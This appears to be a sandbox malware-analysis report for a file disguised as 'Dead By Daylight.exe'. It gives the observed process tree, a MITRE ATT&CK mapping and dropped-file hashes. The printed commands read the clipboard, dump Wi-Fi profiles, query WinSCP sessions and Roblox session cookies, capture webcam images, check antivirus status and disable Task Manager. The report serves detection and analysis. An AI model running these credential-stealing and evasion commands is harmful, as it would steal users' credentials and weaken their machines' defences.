- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:756
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1724
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:6000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1496
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1280
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2076
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3640
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4592
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:688
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4924
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3116
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4196
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4892
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\WTKj8wKmiZc0.vbs"
    3⤵
    PID:4872
  - - C:\Windows\system32\cscript.exe
      cscript C:\Users\Admin\AppData\Roaming\WTKj8wKmiZc0.vbs
      4⤵
      PID:5796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
    3⤵
    PID:1844
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
      4⤵
      PID:5612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
    3⤵
    PID:6156
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
      4⤵
      PID:6216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
    3⤵
    PID:6236
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
      4⤵
      PID:6292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
    3⤵
    PID:6892
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
      4⤵
      PID:6156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
    3⤵
    PID:7192
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
      4⤵
      PID:7252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
    3⤵
    PID:7272
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
      4⤵
      PID:7308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
    3⤵
    PID:7332
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
      4⤵
      PID:7372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
    3⤵
    PID:7396
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
      4⤵
      PID:7436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
    3⤵
    PID:7460
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
      4⤵
      PID:7496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
    3⤵
    PID:7516
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
      4⤵
      PID:7552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
    3⤵
    PID:7576
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
      4⤵
      PID:7616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
    3⤵
    PID:7640
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
      4⤵
      PID:7684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
    3⤵
    PID:7704
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
      4⤵
      PID:7744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""
    3⤵
    PID:7764
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"
      4⤵
      PID:7800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
    3⤵
    PID:7820
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
      4⤵
      PID:7856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
    3⤵
    PID:7872
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
      4⤵
      PID:7908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
    3⤵
    PID:7932
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
      4⤵
      PID:7972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
    3⤵
    PID:8000
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
      4⤵
      PID:8040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
    3⤵
    PID:8064
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
      4⤵
      PID:8100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
    3⤵
    PID:7288
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
      4⤵
      PID:7372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
    3⤵
    PID:7332
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
      4⤵
      PID:7432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
    3⤵
    PID:7396
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
      4⤵
      PID:7484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
    3⤵
    PID:7532
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
      4⤵
      PID:7572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
    3⤵
    PID:7528
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
      4⤵
      PID:7616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
    3⤵
    PID:7600
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
      4⤵
      PID:7644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
    3⤵
    PID:7640
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
      4⤵
      PID:7732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
    3⤵
    PID:7736
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
      4⤵
      PID:7808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""
    3⤵
    PID:7764
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"
      4⤵
      PID:7844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
    3⤵
    PID:7840
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
      4⤵
      PID:7908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
    3⤵
    PID:7884
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
      4⤵
      PID:7984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
    3⤵
    PID:7964
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
      4⤵
      PID:6096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
    3⤵
    PID:4576
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
      4⤵
      PID:8004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
    3⤵
    PID:8000
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
      4⤵
      PID:8120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\wyEKAb51ImWD_temp.ps1""
    3⤵
    PID:4296
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\wyEKAb51ImWD_temp.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4196
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -Command "& { function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace \"root\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { \"262144\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"262160\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"266240\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"266256\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"393216\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"393232\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"393488\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"397312\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"397328\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"397584\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } default { $defstatus = \"Unknown\"; $rtstatus = \"Unknown\" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -Command "& {powershell Get-Clipboard}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -Command "& {netsh wlan show profile}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5712
  - - C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:6128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\eFMrCXBae7a7x2pYdc4s\System\cam.1432_Admin.jpg"
    3⤵
    PID:392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
    3⤵
    PID:5356
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
      4⤵
      PID:5156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:8136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\eFMrCXBae7a7x2pYdc4s\System\cam.1432_Admin"
    3⤵
    PID:2908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5508
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:6084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
    3⤵
    PID:4756
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      PID:5192
- - C:\Users\Admin\AppData\Local\Temp\2Yf7IrXriA7Vrh46mVZ0DJoXMzT\Dead By Daylight.exe
    "C:\Users\Admin\AppData\Local\Temp\2Yf7IrXriA7Vrh46mVZ0DJoXMzT\Dead By Daylight.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1428 --field-trial-handle=1608,12146737355406384576,17684188506695382953,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:5076

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
5d574dc518025fad52b7886c1bff0e13

SHA1
68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7

SHA256
755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2

SHA512
21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1ba98b41d254e6851bccdbc77337a6a1

SHA1
b60ec7e68fe92d43a157786cb0d3b37540c7f116

SHA256
b0f1291f742d42166aeaf4e3ee7f6103b6171eebeb4b55a6e9e5857d63b37fc5

SHA512
8d3bca002799ecdc00efa6af1b4c9e6e866c01bcc9e5f824ace27ae0c59e3bd8df63a3b04aa4748568aa8d3b4bbd70f9417cb61b8bc31b1f61f33cd60eefd1ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a8602ab036cb536eb36cde0230049ef4

SHA1
1d7c1509bb7265ae1c816adb0fbd3d705312cbf5

SHA256
2bc16cac046b9f0d3a298f0d9f6eff6a93c72859c5ce1f5a9c934b6544a8d167

SHA512
60f6c7b8e6728105617b5452c446d99f7accb15bbb2d132589fa6bd931cd9579728832130676ca26bcad6884064ab732e9415d68974161f5c564d6f44a4ded81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ed1181e6e256d5034b8ea646ce87ca03

SHA1
e69919a9c5f2da0fb8d7d17eaf3420c47b93e0f4

SHA256
e068c0be584edd56937fa3fa4c936cf67b1f60b6969eaca4ef525ec3af4b7a1c

SHA512
c919ed0ca10032dc73b7ff182772e9411e49fdc047c4c0b07e68a69e9c0a6715504b0f2a2922d1bf333f4b03881a2455905f6079778e37881ce4c8da3f68627a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c9a20f84a012c0fb6f747c5ff2fe4ad9

SHA1
a2d7f9d56da3eba9ffe85f72608742cae841c23d

SHA256
d6140f53839ce3c864a4d677d789bc83944013f8de4b1b6ecba28bddfd78441a

SHA512
08efb92925493344db8bc03e00fb9e66a90b8e32382e3c2fd89b945787cb1a1def8fe29881e65000abbd07ca9b7f804bc99721101d149b0d633b523fe1e9ab53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c1dabcd76d9650466134e405e571c851

SHA1
90de6ad3bcac48cdf9f9b65b7b20f515182910aa

SHA256
8b173cd7a976eb248c2c782dabb2b942c1ace737201a32e3d69a7fdbe0417031

SHA512
50d99fee27db72e9239f71ef650ebabe697ba9a2662ae952c39190692d6b4264d8e0eab990391d0c4c091bbeb509f940733c15cd5820979489d5ce9d546ee370

Download Submit
